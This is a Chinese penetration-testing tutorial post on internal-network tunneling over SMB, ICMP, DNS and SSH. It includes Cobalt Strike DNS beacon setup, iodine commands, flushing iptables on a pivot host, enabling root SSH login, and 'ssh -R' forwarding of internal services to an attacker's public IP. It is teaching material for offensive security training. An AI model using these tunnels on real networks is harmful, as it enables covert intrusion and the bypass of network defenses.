内网安全-隧道技术SSHDNSICMPSMB上线通讯LinuxMac 简单总结

news2024/11/28 3:33:00

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac_内网安全-隧道技术_ssh_dns_icmp_smb_上线通讯linux_mac-CSDN博客

内网渗透—隧道技术_隧道技术csdn-CSDN博客

#SMB 隧道&通讯&上线 


判断:445 通讯 
上线:借助通讯后绑定上线 
通讯:直接 SMB 协议通讯即可 

上一篇文章有讲解


 
#ICMP 隧道&通讯&上线 


判断:ping 命令 
上线:见前面课程 
通讯:其他项目(icmpsh icmptunnel) 
https://github.com/esrrhs/spp 
https://github.com/bdamele/icmpsh 
https://github.com/esrrhs/pingtunnel 
 


#DNS 隧道&通讯&上线 

在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。


判断:nslookup dig 

DNS上线


1、上线环境:内网主机只出网 DNS 协议数据,解决上线 
-域名申请及配置 

        准备一个域名并配置两条NS解析,NS解析将子域名指定其它DNS解析


-监听器创建及配置 

http协议无法上线

配置监听器

设置监听器,Payload选择Beacon DNSDNS地址选择刚刚填写的ns1记录ns2记录,下面的DNS地址( Stager)填写A记录,也就是CS.xxx.fun


-后门绑定监听器及生成 

在受害者主机执行后门,上线,然后执行命令mode dns -txt

DNS隧道解决通讯问题


2、通讯环境: 
内网主机只出网 DNS 协议数据,解决通讯 
https://github.com/yarrick/iodine 

iodine工作原理是 ,通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。
判断出网:nslookup www.baidu.com 

将工具运行起来,运行起来后,你可以输入命令去查看一下网卡,会发现多出一个网卡,这里的选择的网段,千万不要和现有的网段冲突

-服务器:设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向 
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD 

 

设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向 

-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。


-客户端:连接密码 xiaodi 并绑定域名指向 
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com 

windows不建议用

客户端的工具其实可以直接去官网中下载已经编译好的,但是有一个问题就是无法直接使用,会出现报错,需要安装一个APT网卡

安装软件不现实

客户端的工具运行起来还需要管理员操作,都管理员了,我还要你个DNS隧道干嘛…同样这里,操作完输入命令后,可以看到多出了一个IP地址,刚刚设置的是192.168.0.1网段的IP,那么这里自动就会生成一个192.168.0.2的IP地址。

客户端建立192.168.0.2的虚拟网卡

测试链接


-尝试通讯尝试连接: 
ssh root@192.168.0.2 xiaodi


#SSH 隧道&通讯 

前提:跳板机为linux,获得root权限,

最好跳板机上不要有过多的防火墙策略,也就是Linux内置的防火墙策略,关策略需要使用root权限。

判断:ssh连接


1、上线:


由于CS无SSH协议监听器配置,无法上线。上线linux需要使用插件

内网渗透—Linux上线_cs上线linux-CSDN博客


2、通讯:


由于SSH协议存在于Linux系统,跳板机必须Linux
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

开启ssh协议登录:


vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

ssh参数

-C:压缩传输,提高传输速度

  -f:将SSH传输转入后台执行,不占用当前的Shell

  -N:建立静默连接(建立了连接,但是看不到具体会话)

  -g:允许远程主机连接本地用于转发的端口

  -L:本地端口转发

  -R:远程端口转发

  -D:动态转发(SOCKS代理)

  -P:指定SSH端口


本地:出站封,走正向

ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122

将本地访问1.168080端口流量转发至本地的1122端口

结果:访问192.168.1.166本地1122端口,探测到1.16:8080


ssh远程转发:入站封,走反向

ssh -CfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234

将跳板机上访问的IP地址及端口流量转发至攻击机上的某个端口,

将本地的访问1.168080端口流量转发至47.94.236.117的1234 端口

结果:探测到内网数据

攻击者访问自己本地的1234即可访问windows的8080端口

#控制上线-插件-Linux&Mac&IOS&Android

内网渗透—Linux上线_cs上线linux-CSDN博客


https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1659359.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

光伏设备制造5G智能工厂数字孪生可视化平台,推进行业数字化转型

光伏设备制造5G智能工厂数字孪生可视化平台,推进行业数字化转型。光伏设备制造5G智能工厂数字孪生可视化平台是光伏行业数字化转型的重要一环。通过数字孪生平台,光伏设备制造企业可以实现对生产过程的全面监控和智能管理,提高生产效率&#…

人工智能|推荐系统——工业界的推荐系统之涨指标

一、推荐系统的评价指标 涨指标的方法有哪些? 二、涨指标的方法:召回 2.1 改进双塔模型 2.2 Item-to-Item (I2I) 2.3 类似I2I 的模型 2.4 总结:改进召回模型 三、涨指标的方法:排序模型 3.1 精排模型的改进 3.2 粗排模型的改进 3…

宝塔面板如何删除一个站点

我们一般的网站都是PHPMySQL开发的,所以删除站点,就要先删数据库,再删网站目录 注意:一点要确保无用的再删 删除站点目录

第十二届蓝桥杯省赛真题 Java 研究生 组【原卷】

文章目录 发现宝藏【考生须知】试题 A: 卡片试题 B: 相乘试题 C: 直线试题 D: 路径试题 E : \mathrm{E}: E: 回路计数试题 F: 时间显示试题 G: 最少砝码试题 H : \mathrm{H}: H: 杨辉三角形试题 I: 双向排序试题 J:分果果 发现宝藏 前些天发现了一个巨牛的人工智能学习网站&…

远动通讯屏,组成和功能介绍

远动通讯屏,组成和功能介绍 远动通讯屏是基于电网安全建设而投入的远方监控厂站信息、远方切除电网负荷的设备;主经是由远动装置、通讯管理机、交换机、GPS对时装置、数字通道防雷器、模拟通道防雷器、屏柜及附件等设备组成。变电站远动通讯系统是指对广…

Middle for Mac:简洁高效的文本编辑软件

追求简洁与高效?Middle for Mac将是您文本编辑的最佳选择。这款Mac平台上的文本编辑器,以其独特的魅力和实用的功能,赢得了众多用户的喜爱。 Middle注重用户体验,采用简洁直观的界面设计,让您能够迅速上手并享受高效的…

如何减少冗长变量声明的代码行数

减少冗长变量声明的代码行数有几种方法,具体取决于编程语言和上下文。以下是一些常见的技巧: 问题背景 在编写代码时,经常需要定义许多变量和参数。如果这些变量和参数过多,会导致代码行数增加,可读性降低。例如&…

Metes and Bounds Pro for Mac 激活版:精准数据转换与绘图利器

Metes and Bounds Pro for Mac是一款专为土地测量和边界划定而设计的专业软件,为Mac用户提供了高效、精确的测量工具。其核心功能在于其全面的测量工具和简便的操作流程,能够满足在土地管理、房地产开发、农业规划等领域的多样化需求。 这款软件集合了距…

Java转Kotlin

Kotlin 是一种静态编程语言 2011JetBrains开始开发Kotlin,用于多平台应用(能脱离虚拟机,直接编译成可以在win,mac,linux运行的二进制代码) 2017获得谷歌官方支持 语法简洁(减少了大量的样板代码,语法糖&…

RS3236-3.3YF5 封装SOT-23-5 线性稳压器 带过温保护

RS3236-3.3YF5 是一款由Runic(润石)公司生产的线性稳压器(LDO),以下是该器件的一些功能和参数介绍: 品牌: Runic 产品类型: 线性稳压器 (LDO) 输入电压范围: 最大 7.5V 输出电压: 固定 3.3V 输出电流: 最大…

系分-历年论文题目

年份试题一试题二试题三试题四2023年信息系统数据转换与迁移敏捷开发方法论Devops及其应用论信息系统可行性分析2022年论原型法及其在信息系统开发中的应用论面向对象设计方法及其应用2021年论面向对象的信息系统分析方法论静态测试方法及其应用论富互联网应用的客户端开发技术…

机器学习-12-sklearn案例03-flask对外提供服务

整体思路 训练一个模型,把模型保存 写一个基于flask的web服务,在web运行时加载模型,并在对应的接口调用模型进行预测并返回 使用curl进行测试,测试通过 再创建一个html页面,接受参数输入,并返回。 目录结…

Go 单元测试完全指南(一)- 基本测试流程

为什么写单元测试? 关于测试,有一张很经典的图,如下: 说明: 测试类型成本速度频率E2E 测试高慢低集成测试中中中单元测试低快高 也就是说,单元测试是最快、最便宜的测试方式。这不难理解,单元…

人形机器人大热,优必选、傅利叶智能的春天还有多远?

配图来自Canva可画 进入2024年以来,机器人领域仍然十分热闹。前脚,斯坦福大学华人团队开源的既会做家务、又会煎蛋煮饭的MobileALOHA机器人,在全网刷屏,让不少人直呼“机器人养老有望”;后脚,马斯克就发了…

ERP系统:驱动企业高效、准确发展的核心引擎

企业资源规划(ERP)系统作为大型组织内部不同计算机系统的桥梁,发挥着至关重要的作用。在没有ERP系统的情况下,各部门可能各自拥有一套为其特定任务定制的系统,但这些系统之间是相互孤立的。而引入ERP软件后&#xff0c…

【STM32 |程序实测】LED灯闪烁、LED灯流水线、蜂鸣器

LED闪烁&LED流水灯&蜂鸣器的面包板接线图,及对应程序示例 LED闪烁 面包板接线图如下 开启APB2时钟,并且在GPIOA上进行配置,推挽输出,引脚A0,50HZ速度 #include "stm32f10x.h" /…

如何在Springboot项目的Mapper中增加一个新的sql语句

在做项目的过程中,我发现有的时候需要用到一些不在springboot的Mapper中的Sql语句,那么应该如何进行操作呐?? 平常我们创建springbootmybatisPlus项目的时候是这样创建的:: 1、创建实体类 2、创建Mappe…

OBS插件--自定义着色器

自定义着色器 自定义着色器是一个滤镜插件,可以用于源和场景。插件自带一百多款滤镜效果,支持自己编写效果代码。 下面截图演示下操作步骤: 首先,打开 OBS直播助手 在插件中心左侧导航栏,选择 滤镜 项,然…

【快讯】山东省第四批软件产业高质量发展重点项目开始申报

为加快落实《山东省高端软件“铸魂”工程实施方案(2023-2025)》,提高软件产业规模能级,提升关键软件技术创新和供给能力,塑强数字经济发展核心竞争力,确定开展第四批软件产业高质量发展重点项目申报工作&am…

docker-compose集成elasticsearch7.17.14+kibana7.17.14

1.docker和compose版本必须要高 2.准备ik分词器(elasticsearch-analysis-ik-7.17.14),下面会用到 https://github.com/infinilabs/analysis-ik/releases?page2 3.配置es-compose.yml(切记映射容器内路径不能更改,es和kibana服务…